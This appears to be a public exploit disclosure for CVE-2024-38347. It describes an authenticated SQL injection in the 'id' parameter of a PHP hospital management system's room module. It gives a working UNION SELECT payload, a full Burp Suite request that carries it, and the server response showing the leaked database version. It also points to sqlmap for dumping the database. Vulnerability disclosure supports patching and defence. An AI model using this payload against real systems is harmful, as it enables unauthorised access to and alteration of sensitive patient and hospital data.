-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-38347
64 lines (56 loc) · 2.49 KB
/
CVE-2024-38347
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# Exploit Title: Health Care hospital Management System - SQL Injection (Authenticated)
# Date: 2024-06-05
# Exploit Author: Sandeep Rajauriya
# Vendor Homepage: https://code-projects.org/health-care-hospital-in-php-css-js-and-mysql-free-download/
# Software Link: https://download-media.code-projects.org/2020/04/Health_Care_hospital_IN_PHP_CSS_Js_AND_MYSQL__FREE_DOWNLOAD_AkGgvwi.zip
# Version: 1.0
# Tested on: Windows 11, PHP 8.2.12, Apache 2.4.58
# CVE: CVE-2024-38347
------------------------------------------------------------------------------------
1. Description:
----------------------
Health Care hospital Management System allows SQL Injection via parameter like "id" in "Room Information" module.Exploiting this issue could allow an attacker to compromise the application, access or modify data,
or exploit latest vulnerabilities in the underlying database.
2. Proof of Concept:
----------------------
In sqlmap use 'id' parameter to dump the hostname and banner. Then run SQLmap to extract the data from the database.
3. Example payload:
----------------------
'+union+select+@@version,null,null,null,null,null,null,null--+
4. Burpsuite HTTP Request on 'id' parameter:
----------------------
GET /HMS/roomup.php?id=-1'+union+select+@@version,null,null,null,null,null,null,null--+ HTTP/1.1
Host: --REDACTED--
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://--REDACTED--/HMS/roomavi.php
Connection: close
Cookie: PHPSESSID=podmt61i233pamo53i63gt78f7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=1
5. Burpsuite HTTP Response
----------------------
HTTP/1.1 200 OK
Date: Wed, 05 Jun 2024 17:59:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6411
Connection: close
Content-Type: text/html; charset=UTF-8
>
--REDACTED--
<form method="post" action="">
<div align="left"> Room ID :</div>
<input hidden name="ridd" value="10.4.32-MariaDB" >
<input name="adm_pid" disabled value="10.4.32-MariaDB" style="margin:5px; border-radius:0px" type="text" class="form-control" placeholder="Patient ID" >
<div align="left"> Room Name :</div>
--REDACTED--